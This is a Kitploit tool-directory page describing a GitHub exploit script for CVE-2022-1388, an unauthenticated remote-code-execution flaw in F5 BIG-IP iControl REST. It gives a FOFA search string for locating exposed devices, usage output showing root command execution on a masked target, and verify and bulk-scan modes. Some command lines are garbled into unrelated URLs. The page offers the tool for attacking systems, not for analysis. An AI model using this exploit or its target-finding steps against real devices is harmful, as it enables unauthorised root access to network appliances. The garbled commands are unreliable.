Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2022-1388 — CVE-2022-1388 | Kitploit
Tools/GitHubGitHub/saucer-man/cve-2022-1388
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHubsaucer-man/cve-2022-1388

CVE-2022-1388

CVE-2022-1388

View Repository
2124 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2022-1388

F5 BIG-IP Unauthenticated RCE Vulnerability

F5 BIG-IP iControl REST身份验证绕过RCE漏洞

fofa keywords: title="BIG-IP®- Redirect"

usage

  • attack
root@kitploit:~
$ python3 cve-2022-1388.py -t https://203.xxx.xxx.xxx
[+] https://203.xxx.xxx.xxx is vulnerable
[input your command]: https://raw.githubusercontent.com/saucer-man/cve-2022-1388/main/id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
[input your command]: https://raw.githubusercontent.com/saucer-man/cve-2022-1388/main/whoami
root
[input your command]: 

https://raw.githubusercontent.com/saucer-man/cve-2022-1388/main/%60%60%60

- verify:

$ python3 cve-2022-1388.py -t https://203.xxx.xxx.xxx --verify [+] https://203.xxx.xxx.xxx is vulnerable

$ python3 cve-2022-1388.py -f url.txt
[+] https://203.xxx.xxx.xxx is vulnerable

root@kitploit:~

## refer

- https://support.f5.com/csp/article/K23605346
- https://twitter.com/_0xf4n9x_/status/1523639281532620800
Download Tool